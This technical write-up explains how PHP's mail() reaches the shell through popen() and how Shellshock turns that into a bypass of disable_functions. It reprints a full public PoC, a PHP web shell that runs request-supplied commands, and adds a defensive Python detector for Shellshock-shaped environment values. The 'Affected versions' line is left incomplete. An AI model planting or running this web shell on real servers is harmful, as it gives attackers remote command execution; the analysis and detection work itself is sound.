Let's start with what happens when PHP's mail() function is called.
See ext/mail.c, line 236:

```c
char *sendmail_path = INI_STR("sendmail_path");
```
This reads the sendmail_path setting from the INI. Here is what php.ini says about it:

```ini
; For Unix only.  You may supply arguments as well (default: "sendmail -t -i").
;sendmail_path =
```

As the comment notes, the default value of sendmail_path is "sendmail -t -i".
If extra_cmd (additional parameters supplied by the caller as the fifth mail() argument) is present, spprintf() concatenates sendmail_path and extra_cmd into sendmail_cmd, the command line that is actually executed. If it is absent, sendmail_path is assigned to sendmail_cmd directly.
The code is as follows:

```c
if (!sendmail_path) {
#if (defined PHP_WIN32 || defined NETWARE)
	/* handle old style win smtp sending */
	if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {
		if (tsm_errmsg) {
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);
			efree(tsm_errmsg);
		} else {
			php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));
		}
		MAIL_RET(0);
	}
	MAIL_RET(1);
#else
	MAIL_RET(0);
#endif
}
if (extra_cmd != NULL) {
	spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);
} else {
	sendmail_cmd = sendmail_path;
}
```
Then the command is executed:

```c
#ifdef PHP_WIN32
	sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC);
#else
	/* Since popen() doesn't indicate if the internal fork() doesn't work
	 * (e.g. the shell can't be executed) we explicitly set it to 0 to be
	 * sure we don't catch any older errno value. */
	errno = 0;
	sendmail = popen(sendmail_cmd, "w");
#endif
```

That is, sendmail_cmd is handed to popen(), which runs it through the system shell.
If the system's default /bin/sh is Bash, popen() hands the command to Bash. The earlier Bash vulnerability (Shellshock, CVE-2014-6271) therefore allowed the mail() function to be used to execute arbitrary commands, bypassing disable_functions.
Affected versions: PHP versions
Fix: patch Bash for CVE-2014-6271.
The PoC (http://www.exploit-db.com/exploits/35146/) is as follows:
```php
<?php
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
    $tmp = tempnam(".", "data");
    putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
    // In Safe Mode, the user may only alter environment variables whose names
    // begin with the prefixes supplied by this directive. By default, users
    // will only be able to set environment variables that begin with PHP_
    // (e.g. PHP_FOO=BAR). Note: if this directive is empty, PHP will let the
    // user modify ANY environment variable!
    mail("[email protected]", "", "", "", "-bv"); // -bv so we don't actually send any mail
    $output = @file_get_contents($tmp);
    @unlink($tmp);
    if ($output != "") return $output;
    else return "No output, or not vuln.";
}
echo shellshock($_REQUEST["cmd"]);
?>
```
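To make the two mechanisms above concrete from the defender's side, here is an added example (not code from PHP or from the PoC author) that mirrors the spprintf() step of ext/mail.c and scans a process environment for the Bash function-export shape that Shellshock payloads take. The sample environment is constructed for the example; the function names are my own.

```python
import re
from typing import Dict, List, Optional

# An exported Bash function definition starts with "() {"; a Shellshock
# (CVE-2014-6271) Bash executed whatever followed the closing brace when it
# imported such a variable, which is exactly what the PoC puts into PHP_LOL.
SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")


def build_sendmail_cmd(sendmail_path: str, extra_cmd: Optional[str]) -> str:
    """Mirror the spprintf() step of ext/mail.c: the fifth mail() argument is
    joined to sendmail_path with a space, and the result goes to popen(),
    i.e. to /bin/sh. Nothing in this step quotes or validates extra_cmd."""
    if extra_cmd is None:
        return sendmail_path
    return f"{sendmail_path} {extra_cmd}"


def find_shellshock_env(env: Dict[str, str]) -> List[str]:
    """Return the names of environment variables whose value is shaped like a
    Bash function export. A request-level hook or host monitor can run this
    check before anything reaches popen() and the shell."""
    return sorted(name for name, value in env.items() if SHELLSHOCK_RE.match(value))


# Constructed sample environment (not captured from a real host): the first
# three entries are ordinary, the last two mimic the PoC's putenv() call.
SAMPLE_ENV = {
    "PATH": "/usr/local/bin:/usr/bin:/bin",
    "PHP_FOO": "bar",
    "HOME": "/var/www",
    "PHP_LOL": "() { x; }; echo injected >/tmp/out 2>&1",
    "PHP_BAR": "() { :; }; echo injected",
}

if __name__ == "__main__":
    print(build_sendmail_cmd("/usr/sbin/sendmail -t -i", "-bv"))
    print(find_shellshock_env(SAMPLE_ENV))
```

Patching Bash is the actual fix; the scan only flags the payload shape, it does not make popen() safe.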
PHP Execute Command Bypass disable_functions